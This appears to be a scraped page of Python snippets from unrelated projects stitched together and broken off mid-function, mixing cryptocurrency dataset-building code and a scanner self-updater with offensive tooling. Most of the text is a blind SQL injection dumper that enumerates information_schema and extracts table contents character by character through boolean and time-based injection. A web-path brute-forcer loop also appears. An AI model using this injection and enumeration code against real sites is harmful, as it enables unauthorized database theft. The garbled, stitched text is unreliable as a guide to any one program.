0
    def run_content(self):

        if len(self.columns_name) == 0:
            SqliColumns.get_columns(self)

        # 循环解包,进入注入
        for database_name in self.columns_name:
            for table_name in self.columns_name[database_name]:

                # 获取数据的条数,如果小于设置的self.content_count,那需要设置条数等于self.content_count
                content_counts = self.get_content_count(database_name, table_name)
                if content_counts == 0:
                    logger.warning('Database %s Table %s is empty...' % (database_name, table_name))
                    continue
                elif content_counts != self.content_count:
                    logger.debug('Database %s Table %s content amount change to %d' % (database_name, table_name, content_counts))
                    self.content_count = content_counts
                else:
                    pass

                # 声明一个表储存数据
                content = PrettyTable(list(self.columns_name[database_name][table_name]))
                content.padding_width = 1
                content.align = "r"

                # 每个表都要注入指定条数那么多次
                for limits in xrange(self.content_count):

                    # 声明一个队列,储存返回的值
                    result = Queue.Queue()

                    # 声明线程队列、结果队列和最终插入table的数据队列
                    threads = []
                    results = []
                    contents = []

                    # 开始多线程的注入
                    logger.debug("Start multithreading Sqli...")
                    for column_name in self.columns_name[database_name][table_name]:
                        # 开始一个线程注入一个字段
                        try:
                            t = threading.Thread(target=self.get_content, name='thread for %s' % column_name,
                                                 args=(result, database_name, table_name, column_name, limits))
                            t.start()
                        except:
                            logger.error('Thread error...')

                        threads.append(t)

                    # 等待所有线程结束
                    for t in threads:
                        t.join()

                    # 注入处理返回数据,插入content中的一条
                    while not result.empty():
                        results.append(result.get())

                    # 处理返回的数据
                    for i in list(self.columns_name[database_name][table_name]):
                        for item in results:
                            if item[0] == i:
                                contents.append(item[1])
                            else:
                                continue

                    # 插入数据
                    content_str = ','.join(contents)
                    logger.info("Sqli success content is %s" % content_str)
                    content.add_row(contents)

                # 输出表
                logger.debug("Database %s Table %s sqli success..." % (database_name, table_name))
                print "[*] Database %s Table %s content:" % (database_name, table_name)
                print content
def build_faceted_dataset(source_index, W=10):
    _dataset = load_dataset(source_index, return_index=True)
    index = {}

    for _sym, entry in _dataset.items():
        _df = pd.read_csv(entry['csv'],
                          sep=',',
                          encoding='utf-8',
                          index_col='Date',
                          parse_dates=True)
        _target = pd.read_csv(entry['target_csv'],
                              sep=',',
                              encoding='utf-8',
                              index_col='Date',
                              parse_dates=True)

        ta = _df[entry['features']['ta']]
        cm = _df[entry['features']['cm']]

        # Price history facet (Daily variation of ohlc in last W trading days)
        ohlc = _df[['open', 'high', 'low', 'close']].pct_change()
        ohlc.columns = ['open_pct', 'high_pct', 'low_pct', 'close_pct']
        history_facet = pd.concat(
            [ohlc] + [builder.make_lagged(ohlc, i) for i in range(1, W + 1)],
            axis='columns',
            verify_integrity=True,
            sort=True,
            join='inner')
        # Price trend facet (REMA/RSMA, MACD, AO, ADX, WD+ - WD-)
        trend_facet = ta[[
            "rsma_5_20", "rsma_8_15", "rsma_20_50", "rema_5_20", "rema_8_15",
            "rema_20_50", "macd_12_26", "ao_14", "adx_14", "wd_14"
        ]]
        # Volatility facet (CMO, ATRp)
        volatility_facet = ta[["cmo_14", "atrp_14"]]
        # Volume facet (Volume pct, PVO, ADI, OBV)
        volume_facet = pd.concat([
            _df.volume.pct_change().replace([np.inf, -np.inf], 0),
            ta[["pvo_12_26", "adi", "obv"]]
        ],
                                 axis='columns',
                                 verify_integrity=True,
                                 sort=True,
                                 join='inner')
        # On-chain facet
        cm_1 = cm.reindex(columns=[
            'adractcnt', 'txtfrvaladjntv', 'isstotntv', 'feetotntv', 'splycur',
            'hashrate', 'txtfrcount'
        ]).pct_change()
        cm_2 = cm.reindex(columns=['isscontpctann'])
        chain_facet = pd.concat([cm_1, cm_2],
                                axis='columns',
                                verify_integrity=True,
                                sort=True,
                                join='inner')

        # Drop columns whose values are all nan or inf from each facet
        with pd.option_context('mode.use_inf_as_na',
                               True):  # Set option temporarily
            history_facet = history_facet.dropna(axis='columns', how='all')
            trend_facet = trend_facet.dropna(axis='columns', how='all')
            volatility_facet = volatility_facet.dropna(axis='columns',
                                                       how='all')
            volume_facet = volume_facet.dropna(axis='columns', how='all')
            chain_facet = chain_facet.dropna(axis='columns', how='all')

        improved_df = pd.concat([
            history_facet, trend_facet, volatility_facet, volume_facet,
            chain_facet
        ],
                                axis='columns',
                                verify_integrity=True,
                                sort=True,
                                join='inner')
        # Drop the first 30 rows
        improved_df = improved_df[30:]
        # Save the dataframe
        improved_df.to_csv(
            'data/datasets/all_merged/csv/{}_faceted.csv'.format(_sym.lower()),
            sep=',',
            encoding='utf-8',
            index=True,
            index_label='Date')
        improved_df.to_excel(
            'data/datasets/all_merged/excel/{}_faceted.xlsx'.format(
                _sym.lower()),
            index=True,
            index_label='Date')

        # Add symbol to index
        index[_sym] = {
            'csv':
            'data/datasets/all_merged/csv/{}_faceted.csv'.format(_sym.lower()),
            'xls':
            'data/datasets/all_merged/excel/{}_faceted.xlsx'.format(
                _sym.lower()),
            'target_csv':
            'data/datasets/all_merged/csv/{}_target.csv'.format(_sym.lower()),
            'target_xls':
            'data/datasets/all_merged/excel/{}_target.xlsx'.format(
                _sym.lower()),
            'features': {
                'price_history': [c for c in history_facet.columns],
                'trend': [c for c in trend_facet.columns],
                'volatility': [c for c in volatility_facet.columns],
                'volume': [c for c in volume_facet.columns],
                'chain': [c for c in chain_facet.columns],
            }
        }
        logger.info('Saved {} in data/datasets/all_merged/'.format(_sym))
    with open('data/datasets/all_merged/index_faceted.json', 'w') as f:
        json.dump(index, f, sort_keys=True, indent=4)
Exemple #48
0
    def get_content(self, result, database_name, table_name, column_name, limits):

        # 开始注内容
        content_len = 0
        logger.debug("Start sqli table %s column %s limit %d content..." % (table_name, column_name, limits))

        logger.debug("The sqlirequest is %s, start sqli content..." % self.sqlirequest)

        if self.sqlimethod == "normal":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)

            # 注这一条的数据长度
            logger.debug("Start %dth content length sqli..." % (limits + 1))

            content_len = normal_injection(select="length(`" + column_name + "`)",
                                           source=database_name + "." + table_name,
                                           limit=limits,
                                           dealpayload=self.dealpayload,
                                           data=self.Data, isCount=True,
                                           sqlirequest=self.sqlirequest
                                           )

            logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len))
            logger.info("[*] content_len: %d" % content_len)

            # 然后注content
            logger.debug("Start %dth content sqli..." % (limits + 1))

            content = normal_injection(select="`" + column_name + "`",
                                       source=database_name + "." + table_name,
                                       limit=limits,
                                       dealpayload=self.dealpayload,
                                       data=self.Data, isStrings=True, sqlirequest=self.sqlirequest
                                       )

            logger.debug("Content sqli success...The content is %s..." % content)

            # 把content return回去,以元组的形式
            contents = [column_name, content]
            logger.info("[*] content: %s" % content)
            result.put(tuple(contents))

        elif self.sqlimethod == "build":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)

            # 然后注content 的 length

            retVal = build_injection(select="length(`" + column_name + "`)",
                                     source=database_name + "." + table_name,
                                     limit=limits,
                                     dealpayload=self.dealpayload, data=self.Data,
                                     lens=self.len,
                                     isCount=True, sqlirequest=self.sqlirequest)
            content_len = int(retVal)

            logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len))
            logger.info("[*] content_len: %d" % content_len)

            # 然后注content名字
            # 清空column_name
            content = ""
            logger.debug("Start %dth content sqli..." % (limits + 1))

            for j in trange(int(content_len), desc='%dth Content sqli' % (limits + 1), leave=False):
                retVal = build_injection(select="ascii(substring(`" + column_name + "`," + repr(j + 1) + ",1))",
                                         source=database_name + "." + table_name,
                                         limit=limits,
                                         dealpayload=self.dealpayload, data=self.Data, lens=self.len,
                                         isStrings=True, sqlirequest=self.sqlirequest)
                content += chr(retVal)

            logger.debug("Content sqli success...The content is %s..." % content)

            # 把content return回去,以元组的形式
            contents = [column_name, content]
            logger.info("[*] content: %s" % content)
            result.put(tuple(contents))

        elif self.sqlimethod == "time":

            logger.debug("The sqlimethod is %s..." % self.sqlimethod)

            # 然后注content 的length

            retVal = time_injection(select="length(`" + column_name + "`)",
                                    source=database_name + "." + table_name,
                                    limit=limits,
                                    dealpayload=self.dealpayload, data=self.Data, times=self.time,
                                    isCount=True, sqlirequest=self.sqlirequest)
            content_len = int(retVal)

            logger.debug("Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len))
            logger.info("[*] content_len: %d" % content_len)

            # 然后注content名字
            # 清空column_name
            content = ""
            logger.debug("Start %dth content sqli..." % (limits + 1))

            for j in trange(int(content_len), desc='%dth Database sqli' % (limits + 1), leave=False):
                retVal = time_injection(select="ascii(substring(`" + column_name + "`," + repr(j + 1) + ",1))",
                                        source=database_name + "." + table_name,
                                        limit=limits,
                                        dealpayload=self.dealpayload, data=self.Data, times=self.time,
                                        isStrings=True, sqlirequest=self.sqlirequest)
                content += chr(retVal)

            logger.debug("Content sqli success...The content is %s..." % content)

            # 把content return回去,以元组的形式
            contents = [column_name, content]
            logger.info("[*] content: %s" % content)
            result.put(tuple(contents))

        logger.debug("Sqli table %s column %s limit %d success..." % (table_name, column_name, limits))
def build_old_dataset():
    ohlcv_index = load_preprocessed('ohlcv')
    cm_index = load_preprocessed('coinmetrics.io')
    #social_index = load_preprocessed('cryptocompare_social')
    index = {}
    for _sym in ohlcv_index.keys():
        if not _sym in cm_index:
            logger.warning('Missing blockchain data for {}'.format(_sym))
            continue
        # if not _sym in social_index:
        #     logger.warning('Missing social data for {}'.format(_sym))
        #     continue
        logger.info('Building {}'.format(_sym))
        ohlcv = pd.read_csv(ohlcv_index[_sym]['csv'],
                            sep=',',
                            encoding='utf-8',
                            index_col='Date',
                            parse_dates=True)
        cm = pd.read_csv(cm_index[_sym]['csv'],
                         sep=',',
                         encoding='utf-8',
                         index_col='Date',
                         parse_dates=True)
        #social = pd.read_csv(social_index[_sym]['csv'], sep=',', encoding='utf-8',
        #                index_col='Date', parse_dates=True)
        # Build resampled OHLCV and TA features
        ohlcv_3d = builder.periodic_ohlcv_pct_change(ohlcv,
                                                     period=3,
                                                     label=True)
        ohlcv_7d = builder.periodic_ohlcv_pct_change(ohlcv,
                                                     period=7,
                                                     label=True)
        ohlcv_30d = builder.periodic_ohlcv_pct_change(ohlcv,
                                                      period=30,
                                                      label=True)
        ta = builder.features_ta(ohlcv)
        ta_3d = builder.period_resampled_ta(ohlcv, period=3)
        ta_7d = builder.period_resampled_ta(ohlcv, period=7)
        ta_30d = builder.period_resampled_ta(ohlcv, period=30)
        # Build Coinmetrics blockchain stats
        cm_pct = feature_quality_filter(builder.pct_change(cm))
        # Build Cryptocompare social stats
        #social_pct = feature_quality_filter(builder.pct_change(social))
        # Build target percent variation
        target_pct = builder.target_price_variation(ohlcv['close'], periods=1)
        target_class = builder.target_discrete_price_variation(target_pct)
        target_labels = builder.target_label(target_class,
                                             labels=['SELL', 'HOLD', 'BUY'])
        target_bin = builder.target_binned_price_variation(target_pct,
                                                           n_bins=3)
        target_bin_binary = builder.target_binned_price_variation(target_pct,
                                                                  n_bins=2)
        target_bin_labels = builder.target_label(
            target_bin, labels=['SELL', 'HOLD', 'BUY'])
        target_bin_binary_labels = builder.target_label(target_bin_binary,
                                                        labels=['SELL', 'BUY'])
        # Merge all the datasets
        dataframes = [
            ohlcv, ohlcv_3d, ohlcv_7d, ohlcv_30d, ta, ta_3d, ta_7d, ta_30d,
            cm_pct
        ]  #, social_pct]
        df = pd.concat(dataframes,
                       axis='columns',
                       verify_integrity=True,
                       sort=True,
                       join='inner')
        target = pd.concat([
            target_pct, target_class, target_bin, target_bin_binary,
            target_labels, target_bin_labels, target_bin_binary_labels
        ],
                           axis=1)
        target.columns = [
            'pct', 'class', 'bin', 'binary_bin', 'labels', 'bin_labels',
            'binary_bin_labels'
        ]
        target = target.loc[df.first_valid_index():df.last_valid_index()]
        # Save resulting dataset both in CSV and Excel format
        logger.info('Saving {}'.format(_sym))

        df.to_csv('data/datasets/all_merged/csv/{}.csv'.format(_sym.lower()),
                  sep=',',
                  encoding='utf-8',
                  index=True,
                  index_label='Date')
        df.to_excel('data/datasets/all_merged/excel/{}.xlsx'.format(
            _sym.lower()),
                    index=True,
                    index_label='Date')
        target.to_csv('data/datasets/all_merged/csv/{}_target.csv'.format(
            _sym.lower()),
                      sep=',',
                      encoding='utf-8',
                      index=True,
                      index_label='Date')
        target.to_excel('data/datasets/all_merged/excel/{}_target.xlsx'.format(
            _sym.lower()),
                        index=True,
                        index_label='Date')

        # Add symbol to index
        index[_sym] = {
            'csv':
            'data/datasets/all_merged/csv/{}.csv'.format(_sym.lower()),
            'xls':
            'data/datasets/all_merged/excel/{}.xlsx'.format(_sym.lower()),
            'target_csv':
            'data/datasets/all_merged/csv/{}_target.csv'.format(_sym.lower()),
            'target_xls':
            'data/datasets/all_merged/excel/{}_target.xlsx'.format(
                _sym.lower()),
            'features': {
                'ohlcv': [c for c in ohlcv.columns],
                'ohlcv_3d': [c for c in ohlcv_3d.columns],
                'ohlcv_7d': [c for c in ohlcv_7d.columns],
                'ohlcv_30d': [c for c in ohlcv_30d.columns],
                'ta': [c for c in ta.columns],
                'ta_3d': [c for c in ta_3d.columns],
                'ta_7d': [c for c in ta_7d.columns],
                'ta_30d': [c for c in ta_30d.columns],
                'cm_pct': [c for c in cm_pct.columns],
                #'social_pct': [c for c in social_pct.columns],
            }
        }

        logger.info('Saved {} in data/datasets/all_merged/'.format(_sym))
    with open('data/datasets/all_merged/index.json', 'w') as f:
        json.dump(index, f, sort_keys=True, indent=4)
Exemple #50
0
def update():
    success = False
    NewVersion = getLatestRevision()
    if Version == NewVersion:
        logger.info("Version:{0} 已经是最新版本".format(Version))
        exit(0)
    elif Version < NewVersion:
        logger.info("当前版本 Version: {0},最新版本为 Version: {1}".format(
            Version, NewVersion))
    else:
        logger.info("Version:{0} 已经是最新版本".format(Version))
        exit(0)
    message = input("是否更新?[y/N]")
    if message == "y":
        directory = os.path.abspath(BASE_DIR)
    else:
        exit(0)
    try:
        open(os.path.join(directory, "sWebScanner.py"), "w+b")
    except Exception as ex:
        logger.error("无法更新目录的内容 '{0}'".format(ex))
    else:
        for wildcard in ('*', "."):
            # glob.glob匹配所有的符合条件的文件,并将其以list的形式返回
            for _ in glob.glob(os.path.join(directory, wildcard)):
                try:
                    if os.path.isdir(_):
                        shutil.rmtree(_)
                    else:
                        os.remove(_)
                except:
                    pass
        if glob.glob(os.path.join(directory, '*')):
            errMsg = "无法清除目录的内容 '{0}'".format(directory)
            logger.error(errMsg)
        else:
            try:
                archive = urllib.request.urlretrieve(ZIPBALL_PAGE)[0]

                with zipfile.ZipFile(archive) as f:
                    for info in f.infolist():
                        info.filename = re.sub(r"sWebScanner-main/", "",
                                               info.filename)
                        if info.filename:
                            f.extract(info, directory)

                filepath = os.path.join(BASE_DIR, "config", "config.py")
                if os.path.isfile(filepath):
                    with open(filepath, 'r', encoding='utf-8') as f:
                        nowVersion = re.search(
                            r"(?m)^Version\s*=\s*['\"]([^'\"]+)",
                            f.read()).group(1)
                        logger.info("更新到最新版本:{0}".format(nowVersion))
                        os.remove(archive)
                        success = True
            except Exception as ex:
                logger.error("抱歉!!!更新无法完成 ('{0}')".format(ex))

    if not success:
        logger.info("请前往Github重新下载")
        logger.info("下载地址:{0}".format(GIT_REPOSITORY))
Exemple #51
0
    def get_columns(self):

        # 若tables_name未设置,则全跑一遍
        if len(self.tables_name) == 0:
            SqliTables.get_tables(self)

        # 首先是每个database_name
        for database_name in self.tables_name:

            # 每个databases_name声明为一个字典
            self.columns_name[database_name] = {}

            # 每个table_name需要跑一次columns_name
            for table_name in self.tables_name[database_name]:

                # 每个table_name中的columns_name声明为一个列表储存
                columns_name = []

                # 开始跑columns_name
                logger.debug(
                    "Start sqli databases %s's tables %s's columns..." %
                    (database_name, table_name))

                # 先GET
                if self.sqlirequest == "GET":
                    logger.debug(
                        "The sqlirequest is %s, start sqli columns..." %
                        self.sqlirequest)

                    if self.sqlimethod == "normal":

                        logger.debug("The sqlimethod is %s..." %
                                     self.sqlimethod)
                        logger.debug("Start table's %s column amount sqli..." %
                                     table_name)

                        # 先注columns的数量

                        columns_number = normal_injection(
                            select='COUNT(*)',
                            source="information_schema.columns",
                            conditions="table_name = '" + table_name +
                            "' && table_schema = '" + database_name + "'",
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            isCount=True,
                            sqlirequest=self.sqlirequest)

                        logger.debug(
                            "Columns account sqli success...The columns_number is %d..."
                            % columns_number)
                        logger.info("[*] columns_number: %d" % columns_number)

                        # 每个循环跑一次columns的数据
                        for i in trange(int(columns_number),
                                        desc="Column sqli...",
                                        leave=False,
                                        disable=True):
                            # 首先是column name的长度
                            logger.debug("Start %dth column length sqli..." %
                                         (i + 1))

                            column_name_len = normal_injection(
                                select='length(column_name)',
                                source="information_schema.columns",
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                isCount=True,
                                sqlirequest=self.sqlirequest)

                            logger.debug(
                                "%dth Column name length sqli success...The column_name_len is %d..."
                                % ((i + 1), column_name_len))
                            logger.info("[*] %dth column_name_len: %d" %
                                        ((i + 1), column_name_len))

                            # 然后注columns name

                            column_name = normal_injection(
                                select='column_name',
                                source='information_schema.columns',
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                isStrings=True,
                                sqlirequest=self.sqlirequest)

                            logger.debug(
                                "%dth Column name sqli success...The column_name is %s..."
                                % ((i + 1), column_name))

                            # 把columns_name插入列表
                            columns_name.append(column_name)
                            logger.info("[*] %dth column_name: %s" %
                                        ((i + 1), column_name))

                    elif self.sqlimethod == "build":

                        logger.debug("The sqlimethod is %s..." %
                                     self.sqlimethod)
                        logger.debug("Start table's %s column amount sqli..." %
                                     table_name)

                        retVal = build_injection(
                            select="COUNT(column_name)",
                            source="information_schema.columns",
                            conditions="table_name = '" + table_name +
                            "' && table_schema = '" + database_name + "'",
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            lens=self.len,
                            isCount=True,
                            sqlirequest=self.sqlirequest)
                        columns_number = int(retVal)

                        logger.debug(
                            "Columns account sqli success...The columns_number is %d..."
                            % columns_number)
                        logger.info("[*] columns_number: %d" % columns_number)

                        for i in range(0, int(columns_number)):
                            # 然后注 columns_number 的 length
                            logger.debug("Start %dth column length sqli..." %
                                         (i + 1))

                            retVal = build_injection(
                                select="length(column_name)",
                                source="information_schema.columns",
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                lens=self.len,
                                isCount=True,
                                sqlirequest=self.sqlirequest)
                            column_name_len = int(retVal)

                            logger.debug(
                                "%dth Column name length sqli success...The column_name_len is %d..."
                                % ((i + 1), column_name_len))
                            logger.info("[*] %dth column_name_len: %d" %
                                        ((i + 1), column_name_len))

                            # 然后注column名字
                            # 清空column_name
                            column_name = ""
                            logger.debug("Start %dth column sqli..." % (i + 1))

                            for j in trange(int(column_name_len),
                                            desc='%dth Column sqli' % (i + 1),
                                            leave=False):
                                retVal = build_injection(
                                    select="ascii(substring(column_name," +
                                    repr(j + 1) + ",1))",
                                    source="information_schema.columns",
                                    conditions="table_name = '" + table_name +
                                    "' && table_schema = '" + database_name +
                                    "'",
                                    limit=i,
                                    dealpayload=self.dealpayload,
                                    data=self.Data,
                                    lens=self.len,
                                    isStrings=True,
                                    sqlirequest=self.sqlirequest)
                                column_name += chr(retVal)

                            logger.debug(
                                "%dth Column name sqli success...The column_name is %s..."
                                % ((i + 1), column_name))

                            # 把columns_name插入列表
                            columns_name.append(column_name)
                            logger.info("[*] %dth column_name: %s" %
                                        ((i + 1), column_name))

                    elif self.sqlimethod == "time":

                        logger.debug("The sqlimethod is %s..." %
                                     self.sqlimethod)
                        logger.debug("Start table's %s column amount sqli..." %
                                     table_name)

                        retVal = time_injection(
                            select="COUNT(column_name)",
                            source="information_schema.columns",
                            conditions="table_name = '" + table_name +
                            "' && table_schema = '" + database_name + "'",
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            times=self.time,
                            isCount=True,
                            sqlirequest=self.sqlirequest)
                        columns_number = int(retVal)

                        logger.debug(
                            "Columns account sqli success...The columns_number is %d..."
                            % columns_number)
                        logger.info("[*] columns_number: %d" % columns_number)

                        for i in range(0, int(columns_number)):
                            # 然后注 columns_number 的 length
                            logger.debug("Start %dth column length sqli..." %
                                         (i + 1))

                            retVal = time_injection(
                                select="length(column_name)",
                                source="information_schema.columns",
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                times=self.time,
                                isCount=True,
                                sqlirequest=self.sqlirequest)
                            column_name_len = int(retVal)

                            logger.debug(
                                "%dth Column name length sqli success...The column_name_len is %d..."
                                % ((i + 1), column_name_len))
                            logger.info("[*] %dth column_name_len: %d" %
                                        ((i + 1), column_name_len))

                            # 然后注columns名字
                            # 清空column_name
                            column_name = ""
                            logger.debug("Start %dth column sqli..." % (i + 1))

                            for j in trange(int(column_name_len),
                                            desc='%dth Column sqli' % (i + 1),
                                            leave=False):
                                retVal = time_injection(
                                    select="ascii(substring(column_name," +
                                    repr(j + 1) + ",1))",
                                    source="information_schema.columns",
                                    conditions="table_name = '" + table_name +
                                    "' && table_schema = '" + database_name +
                                    "'",
                                    limit=i,
                                    dealpayload=self.dealpayload,
                                    data=self.Data,
                                    times=self.time,
                                    isStrings=True,
                                    sqlirequest=self.sqlirequest)
                                column_name += chr(retVal)

                            logger.debug(
                                "%dth Column name sqli success...The column_name is %s..."
                                % ((i + 1), column_name))

                            # 把columns_name插入列表
                            columns_name.append(column_name)
                            logger.info("[*] %dth column_name: %s" %
                                        ((i + 1), column_name))

                # 然后是post
                elif self.sqlirequest == "POST":
                    logger.debug(
                        "The sqlirequest is %s, start sqli tables..." %
                        self.sqlirequest)

                    if self.sqlimethod == "normal":

                        logger.debug("The sqlimethod is %s..." %
                                     self.sqlimethod)
                        logger.debug("Start table's %s column amount sqli..." %
                                     table_name)

                        # 先注columns的数量

                        columns_number = normal_injection(
                            select='COUNT(*)',
                            source="information_schema.columns",
                            conditions="table_name = '" + table_name +
                            "' && table_schema = '" + database_name + "'",
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            isCount=True,
                            sqlirequest=self.sqlirequest)

                        logger.debug(
                            "Columns account sqli success...The columns_number is %d..."
                            % columns_number)
                        logger.info("[*] columns_number: %d" % columns_number)

                        # 每个循环跑一次columns的数据
                        for i in trange(int(columns_number),
                                        desc="Column sqli...",
                                        leave=False,
                                        disable=True):

                            # 首先是column name的长度
                            logger.debug("Start %dth column length sqli..." %
                                         (i + 1))

                            column_name_len = normal_injection(
                                select='length(column_name)',
                                source="information_schema.columns",
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                isCount=True,
                                sqlirequest=self.sqlirequest)

                            logger.debug(
                                "%dth Column name length sqli success...The column_name_len is %d..."
                                % ((i + 1), column_name_len))
                            logger.info("[*] %dth column_name_len: %d" %
                                        ((i + 1), column_name_len))

                            # 然后注columns_name

                            column_name = normal_injection(
                                select='column_name',
                                source='information_schema.columns',
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                isStrings=True,
                                sqlirequest=self.sqlirequest)

                            logger.debug(
                                "%dth Column name sqli success...The column_name is %s..."
                                % ((i + 1), column_name))

                            # 把columns_name插入列表
                            columns_name.append(column_name)
                            logger.info("[*] %dth column_name: %s" %
                                        ((i + 1), column_name))

                    elif self.sqlimethod == "build":

                        logger.debug("The sqlimethod is %s..." %
                                     self.sqlimethod)
                        logger.debug("Start table's %s column amount sqli..." %
                                     table_name)

                        retVal = build_injection(
                            select="COUNT(column_name)",
                            source="information_schema.columns",
                            conditions="table_name = '" + table_name +
                            "' && table_schema = '" + database_name + "'",
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            lens=self.len,
                            isCount=True,
                            sqlirequest=self.sqlirequest)
                        columns_number = int(retVal)

                        logger.debug(
                            "Columns account sqli success...The columns_number is %d..."
                            % columns_number)
                        logger.info("[*] columns_number: %d" % columns_number)

                        for i in range(0, int(columns_number)):
                            # 然后注 columns_number 的 length
                            logger.debug("Start %dth column length sqli..." %
                                         (i + 1))

                            retVal = build_injection(
                                select="length(column_name)",
                                source="information_schema.columns",
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                lens=self.len,
                                isCount=True,
                                sqlirequest=self.sqlirequest)
                            column_name_len = int(retVal)

                            logger.debug(
                                "%dth Column name length sqli success...The column_name_len is %d..."
                                % ((i + 1), column_name_len))
                            logger.info("[*] %dth column_name_len: %d" %
                                        ((i + 1), column_name_len))

                            # 然后注columns名字
                            # 清空column_name
                            column_name = ""
                            logger.debug("Start %dth column sqli..." % (i + 1))
                            for j in trange(int(column_name_len),
                                            desc='%dth Column sqli' % (i + 1),
                                            leave=False):
                                retVal = build_injection(
                                    select="ascii(substring(column_name," +
                                    repr(j + 1) + ",1))",
                                    source="information_schema.columns",
                                    conditions="table_name = '" + table_name +
                                    "' && table_schema = '" + database_name +
                                    "'",
                                    limit=i,
                                    dealpayload=self.dealpayload,
                                    data=self.Data,
                                    lens=self.len,
                                    isStrings=True,
                                    sqlirequest=self.sqlirequest)
                                column_name += chr(retVal)

                            logger.debug(
                                "%dth Column name sqli success...The column_name is %s..."
                                % ((i + 1), column_name))

                            # 把columns_name插入列表
                            columns_name.append(column_name)
                            logger.info("[*] %dth column_name: %s" %
                                        ((i + 1), column_name))

                    elif self.sqlimethod == "time":

                        logger.debug("The sqlimethod is %s..." %
                                     self.sqlimethod)
                        logger.debug("Start table's %s column amount sqli..." %
                                     table_name)

                        retVal = time_injection(
                            select="COUNT(column_name)",
                            source="information_schema.columns",
                            conditions="table_name = '" + table_name +
                            "' && table_schema = '" + database_name + "'",
                            dealpayload=self.dealpayload,
                            data=self.Data,
                            times=self.time,
                            isCount=True,
                            sqlirequest=self.sqlirequest)
                        columns_number = int(retVal)

                        logger.debug(
                            "Columns account sqli success...The columns_number is %d..."
                            % columns_number)
                        logger.info("[*] columns_number: %d" % columns_number)

                        for i in range(0, int(columns_number)):
                            # 然后注 columns_number 的 length
                            logger.debug("Start %dth column length sqli..." %
                                         (i + 1))
                            retVal = time_injection(
                                select="length(column_name)",
                                source="information_schema.columns",
                                conditions="table_name = '" + table_name +
                                "' && table_schema = '" + database_name + "'",
                                limit=i,
                                dealpayload=self.dealpayload,
                                data=self.Data,
                                times=self.time,
                                isCount=True,
                                sqlirequest=self.sqlirequest)
                            column_name_len = int(retVal)

                            logger.debug(
                                "%dth Column name length sqli success...The column_name_len is %d..."
                                % ((i + 1), column_name_len))
                            logger.info("[*] %dth column_name_len: %d" %
                                        ((i + 1), column_name_len))

                            # 然后注columns名字
                            # 清空column_name
                            column_name = ""
                            logger.debug("Start %dth column sqli..." % (i + 1))

                            for j in trange(int(column_name_len),
                                            desc='%dth Column sqli' % (i + 1),
                                            leave=False):
                                retVal = time_injection(
                                    select="ascii(substring(column_name," +
                                    repr(j + 1) + ",1))",
                                    source="information_schema.columns",
                                    conditions="table_name = '" + table_name +
                                    "' && table_schema = '" + database_name +
                                    "'",
                                    limit=i,
                                    dealpayload=self.dealpayload,
                                    data=self.Data,
                                    times=self.time,
                                    isStrings=True,
                                    sqlirequest=self.sqlirequest)
                                column_name += chr(retVal)

                            logger.debug(
                                "%dth Column name sqli success...The column_name is %s..."
                                % ((i + 1), column_name))

                            # 把columns_name插入列表
                            columns_name.append(column_name)
                            logger.info("[*] %dth column_name: %s" %
                                        ((i + 1), column_name))

                # 把注入得到的columns_name列表转为元组
                self.columns_name[database_name][table_name] = tuple(
                    columns_name)
        logger.info("Sqli result:")
        # 输出所有的列名
        for database_name in self.columns_name:
            tables_name = ""
            for table_name in self.columns_name[database_name]:
                tables_name += table_name
                tables_name += ','
                columns_name = ""
                for column_name in self.columns_name[database_name][
                        table_name]:
                    columns_name += column_name
                    columns_name += ','

                logger.info("Table %s has columns %s", table_name,
                            columns_name)
            logger.info("Database %s has tables %s", database_name,
                        tables_name)

        print "[*]Columns list:", self.columns_name
Exemple #52
0
def info(message):
    """info log"""
    log.info(message)
Exemple #53
0
        # 迭代我们想要尝试的文件列表
        for brute in attempt_list:

            url = "%s%s" % (target_url, urllib.quote(brute))
            # print url
            try:
                headers = {}
                headers["User-Agent"] = conf['ua']
                r = urllib2.Request(url, headers=headers)
                # pbar.update(1)
                try:
                    response = urllib2.urlopen(r, timeout=2)
                except:
                    logger.error("Time out...")
                    continue  # 有可能卡死

                # 请求完成后睡眠
                time.sleep(stime)

                if response.code != 404:
                    logger.info("Get !!!!" + url)
                    tqdm.write("[%d] => %s" % (response.code, url))

            except urllib2.URLError, e:
                if hasattr(e, 'code') and e.code != 404:
                    tqdm.write("!!! %d => %s" % (e.code, url))

    logger.info("The dictionary queue is empty")
    pbar.close()
    exit(0)
Exemple #54
0
def build(source_index, dest_index, W=10):
    ohlcv_index = load_preprocessed('ohlcv')
    cm_index = load_preprocessed('coinmetrics.io')
    index = {}

    for _sym in ohlcv_index.keys():
        if not _sym in cm_index:
            logger.warning('Missing blockchain data for {}'.format(_sym))
            continue

        logger.info('Building {}'.format(_sym))
        ohlcv = pd.read_csv(ohlcv_index[_sym]['csv'],
                            sep=',',
                            encoding='utf-8',
                            index_col='Date',
                            parse_dates=True)
        cm = pd.read_csv(cm_index[_sym]['csv'],
                         sep=',',
                         encoding='utf-8',
                         index_col='Date',
                         parse_dates=True)

